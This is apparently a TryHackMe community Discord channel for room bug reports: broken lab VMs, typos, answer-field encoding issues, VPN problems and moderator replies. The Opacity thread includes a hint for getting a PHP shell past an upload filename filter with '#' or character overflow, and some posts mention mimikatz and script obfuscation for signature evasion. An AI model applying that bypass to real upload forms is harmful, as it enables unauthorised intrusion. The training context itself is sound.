Lol I was literally about to type the same thing

Might be some issues with lookingglass room.

Despite connecting to the ports, no message was received. Had to consult a writeup and then stackoverflow to resolve some errors just to get the message. (ssh-rsa not being allowed)

Then once finding the port and correctly identifying the encryption, it didn't decrypt, consulted a writeup, confirmed i had correct encryption on 2nd try, went back, still no decrypt.

https://www.twitch.tv/videos/2210359304

Looking glass was perfectly fine when I reviewed it a few weeks ago

mimikatz has been broken in room persistingad, any solution?

Maybe someone else broke it by accident given it's a network you share with 4 other users, and it's saying it's having a size of 0.
So either try to get a new mimikatz executable onto the machine, or reset the network, would be my best suggestion 🙂

Hi, there. It seems there is a problem with the virtual machine deployed for the room Analysing Volatile Memory. In Task 6, it asks about crash dumps, but there is no crashes at all that we can display using Reliability Monitor chart.

I face the same issue. After 10 minutes nmap shows indeed that the port is open , but at first attempt in browser it does not work and afterwards nmap shows the port is filtered

Known issue.

I am seeing the same issue

I just watched a walktrhough and filled out the answers. THere is no point waiting, pretty sure its going to take another few months

So cheating?

that would be copying and pasting without any knowledge or context or idea of what the room was about.

walkthroughs are there to give you the full step by step context and how to approach it, as well as writeups. This is not an active room

machine is not working therefore cannot attempt> not able to do machine > watches full walkthrough to see what it would have entailed > understands concepts > writes answers = cheating

ok mate

^edit maybe another year. Just had a look at the chat history and the oldest message regarding the issue goes back to 2023.

"Incident Handling with Splunk", Task 1, Q1, I'm inputting the correct answer but the room doesn't accept it. Answer: ||CVE-2014–6271||

Thank you for reporting. I have raised this 🙂

Gave +1 Rep to @sinful frigate (current: #1437 - 2)

👋 https://tryhackme.com/r/room/k8sbestsecuritypractices has a few typos of ACAB instead of ABAC in Task 4.
Great room otherwise!

Hey there 👋

Thanks for mentioning it. 🙏 I have fixed it!

Gave +1 Rep to @misty gull (current: #238 - 23)

hey guys

do order mishaps in rooms count as room bugs?

Would be easier if you just state the bug.

What's the error?

order of information

thats y i asked if this is considered a bug

I'm not sure what the issue is?

There isn't a set order for them?

in the video the router is talked abt first, than the switch
but in the site, its the opposite

Ah that's ok, the video could be old.

It's faster to update the material, than it is videos.

also some information in the video is removed from the site

thats cool

and some information might be wrong

In the Analyzing Volatile Memory Room. When going through Task 6 Crash Dump Overview, when running the Reliability Monitor there are no crashes showing. So you cannot find the Report ID and thus cannot continue to and work Task 7.

Analysing Volatile Memory Room
Reliability Monitor chart isn't showing anything i obtained report id from ||event viewer||

also it only shows 3 critical events instead of ||7||

i noticed this now, wait until the room is fixed or try an alternative way

Room: https://tryhackme.com/r/room/maldoc

Issue: Machine starts zoomed out a lot, you can barely see anything...

P.S.

It would also be helpful to be able to copy text outside the Machine...

I dont know if this is a bug or not but my VM's dont time out. the machine is still up. I cant add hours but it states start machine but that states the machine is running again. Refresh the page. a 0:00 timer is shown and i can add a other hour. or close it.

🔥

At least you can continue with Task 7 even though Task 6 is sort of broken...

https://tryhackme.com/r/room/trooper
Hey, I cant login to OpenCTI in this room. It keeps loading the dashboard. tried multiple browsers + incognito and still the same issue

What's your IP?

machine ip? 10.10.155.72

Are you using the attackbox or a vm?

WSL actually but im about to try in the attackbox

That could be an issue.

WSL is pants for workign with the THM VPN.

yup thats it. in attackbox it works. on wsl it complains about a JS script missing but if i access manually the script I can see it.

nvm the script. thats something else

thank you

As previously posted here:
#room-help message

Should use Copy as Value. 🙂

I did... Many times...

Are you on Windows, Linux, Mac?

I've seen a lot of people having issues the last couple of days regarding that...

It's both on Attackbox and my own 2 Kali vms

It always shows http

And no amp; at all

& is html for &

Guesswork for that question is over 9000...

Tshark also shows the same...

I see the issue now. The string value in the answer field auto-converts the & symbol to & for the stored value.

I've added a hint for now until that is fixed.

Thank you for reporting. 👍

Gave +1 Rep to @obtuse ingot (current: #596 - 7)

not really a room bug, more like an omission, but in the tshark cli wireshark features room the command for IPv6 output is missing an underscore, it should be ipv6_hosts

Mhhm I think this is valid for the version that the room is using. Are you using your own install/device with tshark CLI perhaps? If so, could you share the version number for sanity sake?

Nope, I'm using the attached machine. I tried the command in the screenie and it returned as an invalid command

How interesting

Thanks for confirming. I'm taking a look now 🙂

I've updated the task to include ipv6_hosts. Thanks for reporting @polar rivet

Gave +1 Rep to @polar rivet (current: #2172 - 1)

It seems that as of July 12th the HTTPS certificate for TryHackMe.com is no longer issued by E5. This means that the answer for the question in task 8 of https://tryhackme.com/r/room/encryptioncrypto101 can no longer be found. (The Hint might have people thinking that they're being man-in-the-middled)

Could be a good idea to take a screenshot and have the question based on that, as the certificate changes so often @glad badger

The material still shows how to get the answer so it's not so bad if that's changed.

This task had me pulling my hair out haha. Thank you for this post!!

Gave +1 Rep to @rocky ermine (current: #43 - 174)

Followed a walkthru to the letter after trying over an hour on this room. Seems to have issues.

https://tryhackme.com/r/room/opacity

https://www.twitch.tv/videos/2221564191

just skip to the last 10mins to see me following the walkthru, it very much not being the case, and quitting.

What are you having an issue with exactly?

it says upload "shell.php .jpg" and you will get a shell.php you can then access

this is not the case

the writeup says the resulting shell.php will be in the docroot of the server, it isn't, nor is it in /cloud/images/ or /cloud/

Which writeup states that?

the first one that didn't 404

Let's go on a hunch and say that our results will vary depending on the search engine used...

https://medium.com/@ashishoscp/opacity-try-hack-me-boot2root-7bc3dbd9b19a

this is linked from the room itself, listed an official writeup

That's a poorly written writeup.

Where? I don't see that at all.

Oh, they're not official writeups.

They're all just accepted by the author.

i dunno, i was in the right place, doing the right thing. and having no success

im done with it for today

There's two ways you can get a shell on this box.

ill take a break for a bit, maybe try again later

I just uploaded a shell,

I did that several times, but i was using metasploit instead of pwncat

very very similar, same file name, using a php shell. and attempting the filename without .jpg after.

space didn't work, but # did

for breaking the filename filter

You can either break up the file name, or overflow the characters.

Hey, it would be nice to move the room "APIWizards Breach" from "walkthrough" to "challenge".
Room: https://tryhackme.com/r/room/apiwizardsbreach

It’s put on walkthrough on purpose due to there being so many questions and would be a massive point gain

oh check, okay thx

Gave +1 Rep to @topaz thorn (current: #53 - 148)

Do you have any idea about the status of this? Still alot of people seem to have problems with this. And the hint doesn't help either...

Yeah, staff are working on it, I was talking to them last night, I think they're trying to either set a screenshot and show the material, or as Muiri suggested, perhaps setting the question to a cert that will last longer.

Alright, nice

https://tryhackme.com/r/room/sysmon
Task 6 Detecting Mimikatz

I'm guessing this is a typo...

hi https://tryhackme.com/r/room/introtocontainerisation

task 3 in the question: What does an application become when it is published using Docker? Format: An xxxxx (fill in the x's)

when you press hint i got this

yes.. nothing

I don't believe that's a bug, the answer matches the masking.

Oh...?

That may well be...

Can't seem to replicate it though.

Any who, the Hint is listed in the question, just in case that's holding you up.

Apologies for jumping the gun.

It's not because of the answer, I already completed it, it's because of the behavior of that button, although des-zooming in a little more (+10 from 100) solved it.

I gathered that from your screenshot, it helped me grasp your issue.

Which is why I apologised for jumping the gun.

@midnight harbor

there is a BUG in burpsuite intruder task 10
the answer i get using burpsuite is q.rivas:pinkfloyd, and i can only log in with these creds, the supposed correct answer gives an error

i treid to log in with my results and it worked, and i treid to log in with the supposed correct result and it failed
i just treid agan and it gives me a invalid password result for the supposed correct answer, only the result that i got is correct
and i can log in with my answer, how can i get ahold of an appropriate person who can unravel the mystory/bug
i thought that maybe i didnt make a correct attack, but why can i log in only with my answer?
how is this possible? if i get a wrong answer it might be my inexperience, but why does it work? and furthermore, why doesnt the correct answer work by me? only the wrong one does! how can this be?
Just to be clear, the link to the room is : https://tryhackme.com/r/room/burpsuiteintruder
i am using the target ip address that i got from my target machine 10.10.166.67

in this screenshot you can see my burp results, and like i wrote, i can only log in to the website with these creds, the supposed correct answer gives me an error.

thanks, can you please tag an apropriate mod to investigate?

Gave +1 Rep to @drifting dawn (current: #110 - 64)

Np at all, the staff / mods will read this room. Many of them are UK based so it's night time for them (and almost for me) rest assured they will look at it.

ok, thanks again, you were verynhelpful

Gave +1 Rep to @drifting dawn (current: #106 - 65)

Lol, np. I'm glad I could at least provide a sanity check!

UPDATE, i opened a new target machine and it worked as intended

lmao.

yeah, but now i know it wasnt my fault and was actually a bug, i termanated my machine and started a new one and it worked.

R/ this @glad badger -- can't find the individual you've had updating these in the Discord, so sending this your way 🙂
Not sure if they've been messing with the machine or just the content, but as standard the machine should auto-generate those credentials.
i.e., you can't just hardcode them into the answer.

If the machine has been updated to avoid hardcoding those credentials then the codebase is out of my hands and I'm not sure what the cause of the bug mentioned here will be 🤷‍♂️

I retried it using the AttackBox and gives the correct credentials, and the credentials work on the login panel. Are you using your own attacking machine?

no i used the thm attack box

after a while i terminated the target machine and started a new one and it worked as intended, but the first time it gave me that answer as you can see in the screenshot, and only those credentials worked to log in.

and obviously if only these work to log in, that why i got this answer using burp intruder

What is the title of the VM in the Target Machine Information panel?

idk, i closed the machine yesterday, i didnt screenshot the title

When looking at the analytics of Task 10 Question 1, I don't see an increased amount of users not able to answer the question in the last 30 days, so my presumption is that it is not a repeating event.

Bastion v1.6 is the name when i start the same machine now. i also got the correct answer through analyzing the amount of characters the username and password are supposed to have, i treid around 10 times till i got the answer

Cool, that's the correct one. I'll monitor this question for 7 days. Just to give you a number, only 5 out 2107 users in the last 30 days who attempted to answer this question answered it wrong the first time and did not answer it correctly afterwards. This is very low. 🙂

Thank you for your help and time. 🙏

Gave +1 Rep to @midnight harbor (current: #2181 - 1)

this is flaud statistics, because i also got the correct answer after starting a new machine

check how many people got it wrong the first time, that indicates that they got the wrong results using intruder, or for another reason, if they got it right afterward maybe they too reseted their target machine, whatever.

sure, my pleasure.

i would look into why only the wrong login credentials worked by me, im pretty new so i dont know how the system works, but it seems very obvious that the system mistakenly configured that my login should be the answer i got, because only that worked

Only 4 users redeployed their machine within 30 minutes after they answered Task 10 Question 1 incorrectly. Again extremely low. 🙂

in Burp Suite: Other Modules Task 4 Decoder: Hashing, by the last challenge, when you open the keys by default it uses pluma, and it opens without line 50 causing the md5hash to be wrong. this is not a bug, but for a beginner like me it causes a lot of confusion if it opens without line 50, it does say in the hints to add the last line, but there is no last line by default, only when you open with another text editor like sublime text.

i dont want to make you crazy, just sayin that i only redeployed my machine after 3 hours, i was sure that it was my fault and i wrongly used burp

thank goodness for this. Nudged me in the right direction.

Gave +1 Rep to @minor hazel (current: #2181 - 1)

I found a Bug/Issue in the AD-Rooms

f.e. https://tryhackme.com/r/room/lateralmovementandpivoting

The lateralmovement-Interface is not showing at all on the AttackBox

Which means:

systemd-resolve --interface lateralmovement --set-dns [$THMDCIP] --set-domain za.tryhackme.com

Unowkn Interface: Lateralmovement: No such device

My Workaround was Upload the .ovpn file to the AttackBox and create a VPN-Connection and then it worked fine.

To make it more clear, you started the attackbox in this room, right?

Yes

I'm working on Task4 of Signature Evasion and when uploading the challenge-1.ps1 to the specified URL, it timed out after 120 sec and now it won't accept me reuploading the file. Do I have a way to retry without having to completely close and restart the Attack Box?

The rooms "DX1: Liberty Island" and "Island Orchestration" seem to never start. Checked a walkthrough to confirm what services are expected to be open and they never are exposed sadly!

Can anyone help? I've been trying again and the same error pops up. The upload on the attack box never seems to finish and just errors out and I can't reupload because the file already exists. :/

This is the error I get every time I attempt to upload the file. :/

Trying another way to obfuscate the script worked. There should be a way to reupload the file in case it fails or times out. :/